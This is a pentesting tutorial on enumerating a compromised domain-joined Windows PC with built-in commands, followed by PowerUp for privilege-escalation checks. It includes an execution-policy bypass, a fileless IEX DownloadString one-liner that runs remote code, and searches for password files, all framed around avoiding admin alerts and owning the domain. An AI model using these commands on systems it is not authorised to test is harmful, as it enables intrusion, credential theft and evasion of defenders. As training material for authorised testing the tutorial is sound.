In this tutorial I am going to cover basic enumeration of a Windows PC. Let me first set the scene: you have just got a shell on a Windows domain-joined PC as an unprivileged domain user.
Your first steps should be to enumerate as much information from this initial PC as possible, giving you an understanding of what other users and devices can be found on the rest of the network.
This additionally helps you move laterally across the network and raise your permissions to administrator or domain admin. At that point you will own the whole network and have full access to the domain controllers.
Now, I know there are a lot of scripts out there that will automate many of the commands I am about to show; still, in some circumstances you may find yourself in a situation where the user you are currently connected as may not even be able to download a script, or security is tight and you don't really want to alert any admins.
In fact, most of these commands, other than the domain-specific ones, will work on any Windows device, so you can easily try them out for yourself as you read this tutorial.
If you would like to know how to get initial access, check out my tutorial on creating payloads with MSFvenom to learn how to create custom shellcode.
So let's get started.
The net user command on its own displays all the local users on the box.
Adding /domain to the end of the net user command will display all the domain users instead.
You can also gain an insight into a particular user by using net user <username>, to which you can also add /domain for any domain user.
The net user command also allows you to create a new user locally on a PC or on the domain.
However, you need at least local or domain admin rights for that; otherwise you will get an "Access is denied" error.
Net localgroup shows all the local PC user groups.
Just like with the net user command, add /domain to the end of the command to get all the domain user groups.
To find out who is actually a member of a specific group, add the group name to the net localgroup command.
Remember to add /domain to the end of the command for any Windows domain groups.
The net group command works much the same as the net localgroup /domain command. The difference is that net group also lets you perform operations on groups with global scope on the domain, rather than just domain local groups.
The net group command on its own only works if used on a domain controller.
However, add /domain to the command and it can be run on any Windows domain-joined PC.
Add a group name to this command to find out who is a member of the specified group.
The net use command on its own allows you to quickly see all the mapped network drives.
Similarly, you can also use the net use command to map a drive from the command prompt, for example:
net use M: \\dc01\data\deathstarplans
Net start and net stop allow you to manage services running on the PC; running the net start command on its own shows all the services that are currently started.
Netstat stands for network statistics. It displays information about TCP network connections, listening ports, established connections and much more.
I usually use the -ano switches after the netstat command as this displays all connections and listening ports (a), addresses and port numbers in numerical form (n) and the process ID associated with each connection (o).
There are lots of different options you can add to the netstat command, each producing a different output.
You can list all the options by adding /? to the end of the command.
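As an added example (not part of the original tutorial), the Python below parses constructed netstat -ano and tasklist /fo csv /nh output, joins the two on the PID column that the -o switch adds, and lists which process is behind each socket exposed on all interfaces. This is the same correlation a defender does when reviewing a host's listening ports; the sample outputs are made up for the example.

```python
import csv
import io

# Constructed sample output of `netstat -ano` (not captured from a real host).
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       4120
  TCP    10.0.0.5:49712         10.0.0.1:445           ESTABLISHED     4
  UDP    0.0.0.0:5355           *:*                                    1316
"""

# Constructed sample output of `tasklist /fo csv /nh` (image name, PID, ...).
TASKLIST_SAMPLE = '''"svchost.exe","900","Services","0","8,000 K"
"System","4","Services","0","20 K"
"python.exe","4120","Console","1","15,000 K"
"svchost.exe","1316","Services","0","6,000 K"
'''

def parse_netstat(text):
    """Parse `netstat -ano` rows into dicts: proto, addr, port, state, pid."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # skip the banner, header and blank lines
        # UDP rows have no State column, so take the PID from the last field.
        local, pid = parts[1], int(parts[-1])
        state = parts[3] if parts[0] == "TCP" else ""
        addr, port = local.rsplit(":", 1)  # rsplit copes with [::]:port
        rows.append({"proto": parts[0], "addr": addr, "port": int(port),
                     "state": state, "pid": pid})
    return rows

def parse_tasklist(text):
    """Map PID -> image name from `tasklist /fo csv /nh` output."""
    return {int(r[1]): r[0] for r in csv.reader(io.StringIO(text)) if r}

def exposed_listeners(netstat_text, tasklist_text):
    """Return sorted (proto, port, image) for sockets bound on all interfaces."""
    procs = parse_tasklist(tasklist_text)
    out = []
    for r in parse_netstat(netstat_text):
        listening = r["state"] == "LISTENING" or r["proto"] == "UDP"
        if listening and r["addr"] in ("0.0.0.0", "[::]"):
            out.append((r["proto"], r["port"], procs.get(r["pid"], "?")))
    return sorted(out)
```

Loopback-only listeners such as 127.0.0.1:8080 are deliberately left out, since they are not reachable from the rest of the network.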
Netsh firewall gives you options to control the Windows firewall; adding show state to the command outputs the current firewall status to the terminal.
If you need more detailed information about the firewall, add show config to display a much more in-depth output.
The netsh firewall command has actually been deprecated in favour of netsh advfirewall; that being said, all the netsh firewall commands still work.
Ipconfig displays the networking information of the PC you're currently connected to.
If you add /all to the ipconfig command it will give you a more detailed output, which includes the DHCP and DNS servers the PC is using.
The route print command displays the routing table of the Windows PC you're connected to.
The routing table is a set of rules used to determine where data packets are directed over the network. All networked devices, including routers and switches, use routing tables.
Tasklist displays a list of the processes currently running on a PC.
Adding the /svc switch to the command displays which services are hosted in each process.
The arp -a command displays the IP-to-physical-address translations used by the Address Resolution Protocol.
This is basically showing all the other devices that the PC you are connected to has previously seen on the network, including their associated MAC addresses.
Driverquery quickly displays all the device drivers on the PC you're connected to.
This gives you the name of each device driver and its version information, which ultimately helps in finding exploits and, in turn, privilege escalation.
Hostname prints the name of the PC you are currently connected to.
The Windows Management Instrumentation command (wmic) allows you to retrieve a huge range of information about local or remote PCs and could probably do with a tutorial all of its own.
If you add qfe to the wmic command (wmic qfe) you get a list of all the hotfixes installed on a Windows PC.
This lets you quickly see the patch level of a PC and work out if there are any areas for exploitation.
The set command on its own shows all the environment variables of the PC you're connected to.
This lets you quickly see environment information, for instance the name of the domain controller or where the user profile is stored.
The systeminfo command on its own can give you lots of information about the PC you are currently connected to.
The only problem is that it can take a long time gathering all the hotfix information.
However, you can pipe (|) the output to the find string (findstr) command to output just the information you're after.
In the command below I am just displaying the OS Name and OS Version, which includes the Windows build number.
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Schtasks allows you to manage scheduled tasks on a local or remote machine.
I like to use /query to list all the scheduled tasks on the Windows PC and set the output format (/fo) to LIST to make it easier to read.
Schtasks /query /fo LIST /v
The /v at the end of the command is for verbose output and lets you see which user each scheduled task runs as; this is important later on for things like privilege escalation.
Whoami on its own quickly tells you the domain and username of the user you are currently connected as.
Moreover, by adding /all to the command you receive a more detailed output that includes SID, group and privilege information.
This is a command I like to run straight off the bat. Echoing out %logonserver% displays the domain controller's name.
This command echoes out the username of the user you are connected as.
Simple File Search
The commands listed below allow you to quickly scan a PC for documents that are either named with, or contain, specific words, for example "password".
dir /s *password*
findstr /s /n /i /p foo*
findstr /si pass *.txt *.xml *.ini
We can't talk about situational awareness and privilege escalation without taking a few minutes to look at PowerUp.
PowerUp is one of the PowerShell modules from PowerSploit, which is a PowerShell post-exploitation framework.
PowerUp quickly audits a PC for common Windows privilege escalation vectors. It can be run by any user, even an unprivileged one.
Download PowerUp from HarmJ0y's GitHub: https://raw.githubusercontent.com/HarmJ0y/PowerUp/master/PowerUp.ps1
Download the raw script from HarmJ0y's GitHub repo (above).
In the command prompt type:
powershell.exe -nop -exec bypass
Import the PowerUp module:
Run the Invoke-AllChecks function, which runs through all the relevant checks for the PC and outputs a status report:
You can even run PowerUp straight from GitHub without ever touching disk by typing the command below.
powershell -nop -exec bypass -c "IEX (New-Object Net.webClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"
These are some of the commands that I run when I get an initial foothold on a Windows PC. Nevertheless, let's be clear: no one has time to remember all these commands.
Luckily, Leostat has created a quick Python script, rtfm.py, that makes tons of these handy commands easily searchable.
If you think I have missed any commands here, or would like to let me know what commands you use, please let me know in the comments below.